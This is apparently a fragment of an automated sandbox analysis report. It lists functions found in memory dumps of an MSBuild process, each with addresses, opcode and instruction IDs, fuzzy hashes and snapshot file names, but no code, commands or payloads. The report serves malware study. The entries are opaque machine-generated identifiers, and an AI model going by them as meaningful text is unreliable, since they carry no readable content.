                                                                                                            • API String ID: 0-4067256894
                                                                                                            • Opcode ID: 0342312de2926fa753860520777b023ac21dc55c72f957ec82cb1062a2df17d7
                                                                                                            • Instruction ID: 5d3fb0044ddb499f75d5f6dbc1d5c50b26bda4d048c3c6d92dd660b99de43905
                                                                                                            • Opcode Fuzzy Hash: 0342312de2926fa753860520777b023ac21dc55c72f957ec82cb1062a2df17d7
                                                                                                            • Instruction Fuzzy Hash: 06212274E012199FCB09DFAAD8406EEBBF2EF89310F10806AE914B7350D7340A45CFA1
                                                                                                            Function 06695B58 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: u
                                                                                                            • API String ID: 0-4067256894
                                                                                                            • Opcode ID: 5073af3c3f7dc48cebfb78eaa821f85b89b1fbb31687175673c59aec702b9581
                                                                                                            • Instruction ID: 4dd7f861583f4c8d03ff3c8cf403b2c1102139d66773da527f349f1fb452a843
                                                                                                            • Opcode Fuzzy Hash: 5073af3c3f7dc48cebfb78eaa821f85b89b1fbb31687175673c59aec702b9581
                                                                                                            • Instruction Fuzzy Hash: 2B21C274E012199FCB44CFAAD4406EEBBF2BF88310F10902AE915B7340D7745941CFA0
                                                                                                            Function 06690917 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: |
                                                                                                            • API String ID: 0-2343686810
                                                                                                            • Opcode ID: 3fbd3b5d400ab46e094273fca79df2c4aaac6eed4de1cb6e0d26a1aebe69c1af
                                                                                                            • Instruction ID: 7966ad98ab875f8c44248a205dc0a4a2c6ccef20434c0b77682369cd93979961
                                                                                                            • Opcode Fuzzy Hash: 3fbd3b5d400ab46e094273fca79df2c4aaac6eed4de1cb6e0d26a1aebe69c1af
                                                                                                            • Instruction Fuzzy Hash: 26F05834D05308AFCB44DFA9D84669DFFB4EB09200F04C1AAD81893261DB349A06CBA2
                                                                                                            Function 06690928 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: |
                                                                                                            • API String ID: 0-2343686810
                                                                                                            • Opcode ID: 75da702b4856afffb933368939243b6411bbd041023b7387cdb016166fdbf6bb
                                                                                                            • Instruction ID: 045114056d48b8be2aaffd1dcba63c343920230ba48609f1128feb2fe4146a3f
                                                                                                            • Opcode Fuzzy Hash: 75da702b4856afffb933368939243b6411bbd041023b7387cdb016166fdbf6bb
                                                                                                            • Instruction Fuzzy Hash: B4E0EE74E00208AFCB84DFA9D54969DBBB5AB48210F0081AAD918A3360EB349A00CF41
                                                                                                            Function 07417FC7 Relevance: .6, Instructions: 569COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2535967631.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_7410000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e8230abfe8fee6411edc895c0d7e32c79fe765e721d55b24d2d07478babbbd72
                                                                                                            • Instruction ID: 44c902ce7a56c00c0ebc3a636ae15d71b33b2e15e75785ecb8cb9e1b546aaf6c
                                                                                                            • Opcode Fuzzy Hash: e8230abfe8fee6411edc895c0d7e32c79fe765e721d55b24d2d07478babbbd72
                                                                                                            • Instruction Fuzzy Hash: CE52C0B4A012298FDB65DF68C984BD9BBF5BB49310F1485EAE40DA7350DB30AE85CF44
                                                                                                            Function 0742A2B8 Relevance: .4, Instructions: 434COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2536027970.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_7420000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 277f7f0fc13a5e2637fdf38642ac50300ab3d3df13973dd1c00f8df8bf3f7939
                                                                                                            • Instruction ID: 0875bac3c2300d101c1756b7ce2c322a774b83dcecf44dd1e29f9b3bf73e3b48
                                                                                                            • Opcode Fuzzy Hash: 277f7f0fc13a5e2637fdf38642ac50300ab3d3df13973dd1c00f8df8bf3f7939
                                                                                                            • Instruction Fuzzy Hash: 4322B574E012298FDB64DF68C984B9DBBB2BF48304F5481EAD809A7355DB34AE81DF50
                                                                                                            Function 0669E8D8 Relevance: .3, Instructions: 262COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 57cbc17683e91efeaa08cd32807f38b72beb4c1fe211b349a99d00cab581981d
                                                                                                            • Instruction ID: b501d00a5de7f4000782d8529a0b2bf337f4b3d8e3fdf1a228e407044528603b
                                                                                                            • Opcode Fuzzy Hash: 57cbc17683e91efeaa08cd32807f38b72beb4c1fe211b349a99d00cab581981d
                                                                                                            • Instruction Fuzzy Hash: 10B17074A00B058FDBA4CF29D584A5ABBF5FF48310B148A2EE99ACB750D731F845CB90
                                                                                                            Function 022BF55A Relevance: .3, Instructions: 254COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 65624560de9c01f82315b0a0a436a895e61fc2f938bc76f00585789d9849fb2c
                                                                                                            • Instruction ID: cb35de6c9028e630803fee35ecb3810a012e7fd1e259dc0d9e7f035d4b774daf
                                                                                                            • Opcode Fuzzy Hash: 65624560de9c01f82315b0a0a436a895e61fc2f938bc76f00585789d9849fb2c
                                                                                                            • Instruction Fuzzy Hash: 4AB1FE75E002088FDB14DFA8D988A9EBBF2FF88310F258169E419AB395D734AD45CF54
                                                                                                            Function 022BF568 Relevance: .2, Instructions: 243COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ccf1a1276ea889c1873c96c0e8c7986bf1e44f720616494abbacff77fcbc1210
                                                                                                            • Instruction ID: bba1e8eeec5cc4a7b639cfb3d8f3de534228213eb0f53ba091027b8d9f167577
                                                                                                            • Opcode Fuzzy Hash: ccf1a1276ea889c1873c96c0e8c7986bf1e44f720616494abbacff77fcbc1210
                                                                                                            • Instruction Fuzzy Hash: 99B1DC74E002098FDB14DFA8C988A9EBBF2FF88310F258169E419AB395D734AD45CF54
                                                                                                            Function 06694758 Relevance: .1, Instructions: 147COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 74223462ec159be3700a857cf734174e6b74a4dfebebf3b85cca30c9f2cc4fc0
                                                                                                            • Instruction ID: 4d5bdefbe5d05f593ab555ed236f4d8d2d3af513bdd390423c7314a218a6357d
                                                                                                            • Opcode Fuzzy Hash: 74223462ec159be3700a857cf734174e6b74a4dfebebf3b85cca30c9f2cc4fc0
                                                                                                            • Instruction Fuzzy Hash: 86511570E012089FCB48DFA9D995AAEBBF6EF89310F14812AD415B7390DB349946CF60
                                                                                                            Function 0669B630 Relevance: .1, Instructions: 145COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5abb6b5a6e6ca09f4a193e17953262eae845127a09b21892225afa1eab073c15
                                                                                                            • Instruction ID: 3a24b23b0c8c506eb45d6b38a5b14f083932896465651b62050ed47682cba14c
                                                                                                            • Opcode Fuzzy Hash: 5abb6b5a6e6ca09f4a193e17953262eae845127a09b21892225afa1eab073c15
                                                                                                            • Instruction Fuzzy Hash: AC51C374E016198FDB54DFA9D884ADEBBF6BF88300F24812AE819EB355D7309941CF64
                                                                                                            Function 06696BCC Relevance: .1, Instructions: 144COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7939def8eebbd97483eac2cd6d793f0dd7afd6f98666906febb412e67b99d2f6
                                                                                                            • Instruction ID: 828d32b50b9be0fcb5e3c90e929f9661d645d57a853a765fa06348d84a9eb16c
                                                                                                            • Opcode Fuzzy Hash: 7939def8eebbd97483eac2cd6d793f0dd7afd6f98666906febb412e67b99d2f6
                                                                                                            • Instruction Fuzzy Hash: 8051C874E012198BEB64DF68C990B9DB7B6FB88300F148295D419EB385DB34ED82CF54
                                                                                                            Function 06696BC3 Relevance: .1, Instructions: 144COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bf84ede6bb928f958600351a5b60a8fd9a4da879e6d29dbb85b71e118c7a798f
                                                                                                            • Instruction ID: e1ddc9b7caabc445514c9bfb3c1197bef7026bbd87801073aff91bf0f29ed41d
                                                                                                            • Opcode Fuzzy Hash: bf84ede6bb928f958600351a5b60a8fd9a4da879e6d29dbb85b71e118c7a798f
                                                                                                            • Instruction Fuzzy Hash: 6A51D974E012198BEB64DF68C990B9DB7B6FB88300F148295D419E7385D734ED92CF94
                                                                                                            Function 06696BC1 Relevance: .1, Instructions: 140COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6eba33bb8ccce871babd44a54fca290775a268d63a8875895c3f6e2e8381e65b
                                                                                                            • Instruction ID: 3dbec50d8f2f10e92acbf701330cad1e6d33511a9cb2bbfcdbb951333c74dad5
                                                                                                            • Opcode Fuzzy Hash: 6eba33bb8ccce871babd44a54fca290775a268d63a8875895c3f6e2e8381e65b
                                                                                                            • Instruction Fuzzy Hash: B951C874A012198BEB64DF69C990B9DB7B6FF88300F148295D419E7385DB34ED82CF54
                                                                                                            Function 06694978 Relevance: .1, Instructions: 140COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 27d48cd97fc7a64ea8b5252dd1d3966e454d03d3e52124572404baf7bb883154
                                                                                                            • Instruction ID: 63c230a9a38926eaaa98b9e1196610c602c64d464b8484cd0616e8cd25399dc8
                                                                                                            • Opcode Fuzzy Hash: 27d48cd97fc7a64ea8b5252dd1d3966e454d03d3e52124572404baf7bb883154
                                                                                                            • Instruction Fuzzy Hash: AF51F675E012099FDF44CFA9D9806AEBBF6BF88310F248139D815E7318EB349902CB64
                                                                                                            Function 0669E8B8 Relevance: .1, Instructions: 124COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5326d0421fc6b762d3f379e03d3ad342950406c1d1584d51478f3d779bc3c523
                                                                                                            • Instruction ID: 6e0cea24bd3bbe7850d09530bc038912ee6ede14041b6da8d51888b45b5ec6c4
                                                                                                            • Opcode Fuzzy Hash: 5326d0421fc6b762d3f379e03d3ad342950406c1d1584d51478f3d779bc3c523
                                                                                                            • Instruction Fuzzy Hash: 94514770A04B018FDBB1CF29D450756BBF4FF45204F040A6ED486CBA51E736E849CB91
                                                                                                            Function 022BAE5F Relevance: .1, Instructions: 110COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 629fe6ce00e41ecea546a0cc0b07548dd80181f923cb76a42484b41688ae411c
                                                                                                            • Instruction ID: b00f720b8ce57223ccaba30a61f7a20bf6293d15ecb9d85a64ec83f2068ba500
                                                                                                            • Opcode Fuzzy Hash: 629fe6ce00e41ecea546a0cc0b07548dd80181f923cb76a42484b41688ae411c
                                                                                                            • Instruction Fuzzy Hash: BF417A75E212098FCB00CFA8C4886EDFBB2FF8A355F14A514E009F7298C7359986CB54
                                                                                                            Function 022BEE00 Relevance: .1, Instructions: 99COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 24cfa4b2b58f2af51f1850988e4636e8b48e30004b7a325b0598e7966b2e663a
                                                                                                            • Instruction ID: 2fe9030f16baef1bb07b603b173a66620f27e7500e15bcc70471690fc345ba27
                                                                                                            • Opcode Fuzzy Hash: 24cfa4b2b58f2af51f1850988e4636e8b48e30004b7a325b0598e7966b2e663a
                                                                                                            • Instruction Fuzzy Hash: 6141D074D10219DFCB01CFA9D980AEEBBF5FF48310F149166E815A7264E734AA85CF91
                                                                                                            Function 06694748 Relevance: .1, Instructions: 92COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 811d0cad01621d7a78c7f25153b34090cc70f352648eab312d069e46213514fe
                                                                                                            • Instruction ID: c5e823eb655dbaa045c4c99914229bf38b07a1920290404ad3cfa03e48323ee7
                                                                                                            • Opcode Fuzzy Hash: 811d0cad01621d7a78c7f25153b34090cc70f352648eab312d069e46213514fe
                                                                                                            • Instruction Fuzzy Hash: EA315970E012089FDB58DFB9D9946AEBBF6EF89300F24846AD411A7350DB749D46CB60
                                                                                                            Function 022BF888 Relevance: .1, Instructions: 90COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 44bb287b3dc291492db7f33ef24e8f17431601a580dc120d36c866163ed55121
                                                                                                            • Instruction ID: 0e79486fb2aea2fbe7bfd6a91560da1095e421b8237d2bec011f01aba2acbfe9
                                                                                                            • Opcode Fuzzy Hash: 44bb287b3dc291492db7f33ef24e8f17431601a580dc120d36c866163ed55121
                                                                                                            • Instruction Fuzzy Hash: 4C315735D00209DFCB10DFA9D984ADEBBB1FF46320F158255E464AB39AD730A906CF40
                                                                                                            Function 0669FA51 Relevance: .1, Instructions: 88COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f014071c913f6fb8e08bedeac4db71400be473946c5c0b9a62358ace7d541b57
                                                                                                            • Instruction ID: 453c2c32a70adbaeb75bdd0f326a43b36d2b192ee018f3126bfb3d683fd38c23
                                                                                                            • Opcode Fuzzy Hash: f014071c913f6fb8e08bedeac4db71400be473946c5c0b9a62358ace7d541b57
                                                                                                            • Instruction Fuzzy Hash: DA31CD31E003198BEF21DF61D4507AEBBFAAB44710F068529CC16EB344CB70A845CBE1
                                                                                                            Function 022BAD58 Relevance: .1, Instructions: 84COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 24a814ddfda4270dcd4c0a8e0b43f91932ff2077eda0762d28effd84d8b602cf
                                                                                                            • Instruction ID: d96ca93f59ed6dbb6669a2c90d77441416921d8108574a2349be5d17872017b8
                                                                                                            • Opcode Fuzzy Hash: 24a814ddfda4270dcd4c0a8e0b43f91932ff2077eda0762d28effd84d8b602cf
                                                                                                            • Instruction Fuzzy Hash: 9F311674D002488FDB08DFAAD9886DDFBF2BF89340F14C269E405AB298DB749945CF14
                                                                                                            Function 022BAD68 Relevance: .1, Instructions: 80COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9fb6c5e5f7518da1471c036f207abaedc6cf235ba24fa4c6efd777d0abbe4862
                                                                                                            • Instruction ID: 3092a219fde1459b1b7ae102e85adc484176648fcc3da3da5d1f666e68c4ba4e
                                                                                                            • Opcode Fuzzy Hash: 9fb6c5e5f7518da1471c036f207abaedc6cf235ba24fa4c6efd777d0abbe4862
                                                                                                            • Instruction Fuzzy Hash: 7A31E575D002088BDB08DFEAD9846DDFBF2BF89350F14D229E405AB298DB745945CB54
                                                                                                            Function 06694B41 Relevance: .1, Instructions: 80COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1f03e05f62b7344f231b271895b44f007babacc914a71f03370ae1a3ebcd124f
                                                                                                            • Instruction ID: 89cfe756fb3c9df2fc2525a82211783d3a085df153f795df2b778a5ecaddd527
                                                                                                            • Opcode Fuzzy Hash: 1f03e05f62b7344f231b271895b44f007babacc914a71f03370ae1a3ebcd124f
                                                                                                            • Instruction Fuzzy Hash: BA314571E012189FDB48DFA5D854AEEBBF2FF89311F14806AD905B7390DB354A46CBA0
                                                                                                            Function 00BFD614 Relevance: .1, Instructions: 77COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2524519582.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_bfd000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 99d83a373f8b14dca17bc877d37715674fe30c843e0d712b23edf0d01fe4f08e
                                                                                                            • Instruction ID: f8759847258800614508b2c0ced6c0fe2c6e6e8f4cd37578e5c99cef0e157299
                                                                                                            • Opcode Fuzzy Hash: 99d83a373f8b14dca17bc877d37715674fe30c843e0d712b23edf0d01fe4f08e
                                                                                                            • Instruction Fuzzy Hash: 6E213871504244EFDB05DF10D8C4B26BBA2FB88314F2082A9EA4D4F256C336D81ADB61
                                                                                                            Function 00BFD4D8 Relevance: .1, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2524519582.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_bfd000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9501157a0d59b341bc6f009f3f328a4e4dc9b9d6818cd80d840e40e990599ed2
                                                                                                            • Instruction ID: b62cc27d57d86afcd2976c53ed9cd676e88bc409426a821b6a94990fce7650c4
                                                                                                            • Opcode Fuzzy Hash: 9501157a0d59b341bc6f009f3f328a4e4dc9b9d6818cd80d840e40e990599ed2
                                                                                                            • Instruction Fuzzy Hash: C3213D71504308DFDB14DF14D9C4B26BFA6FBA4318F2085ADDA050F256C336D85ACBA2
                                                                                                            Function 06697991 Relevance: .1, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ab1df0736fa82c8ed063e15ba55672a9f4a0fb861acd136a8fe0468051812962
                                                                                                            • Instruction ID: 6ad6149cd52094b01a376450fd7f777b19d2b7da4752fff98d382a911b3fa686
                                                                                                            • Opcode Fuzzy Hash: ab1df0736fa82c8ed063e15ba55672a9f4a0fb861acd136a8fe0468051812962
                                                                                                            • Instruction Fuzzy Hash: BF218974D00248AFCB40DFBCC545A9EBFB4FF42310F158299D454E7696D7749A80CBA9
                                                                                                            Function 00C0D580 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2524635681.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_c0d000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: efd108b43c0b5e940fb4c1687a2f0ba2f89701ab99954696d9b0e8918921a567
                                                                                                            • Instruction ID: 3641e95897f7dcb70b1920fc811918c5cfc2c12bdbb8337e3133748cbd8edf1b
                                                                                                            • Opcode Fuzzy Hash: efd108b43c0b5e940fb4c1687a2f0ba2f89701ab99954696d9b0e8918921a567
                                                                                                            • Instruction Fuzzy Hash: EA21F2B5604200DFDB14DF94D9C0B26BB65FB88314F20C9ADE80E4B286C337D846CA61
                                                                                                            Function 00C0D208 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2524635681.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_c0d000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d9989fa5bf1205a3016ecdf48fd0b163d3160fe355b8def0f35129a896dadb9f
                                                                                                            • Instruction ID: 0e103b4e03b378166e4e6de4170cc34993e4db6669be6c844b944b934a199560
                                                                                                            • Opcode Fuzzy Hash: d9989fa5bf1205a3016ecdf48fd0b163d3160fe355b8def0f35129a896dadb9f
                                                                                                            • Instruction Fuzzy Hash: 1121F371604344DFDB14DF94E9C4B26BB65FB94324F24C669E84A4B286C336DC46CA62
                                                                                                            Function 00C0D3B8 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2524635681.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_c0d000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6e915957190fb2479af6c706c53fc0175d4e731d630eae225377d062e1408eb2
                                                                                                            • Instruction ID: a40dacd00801d9c127ebb40e64552d8eb1eb73728fe9c0223aec57951a59be39
                                                                                                            • Opcode Fuzzy Hash: 6e915957190fb2479af6c706c53fc0175d4e731d630eae225377d062e1408eb2
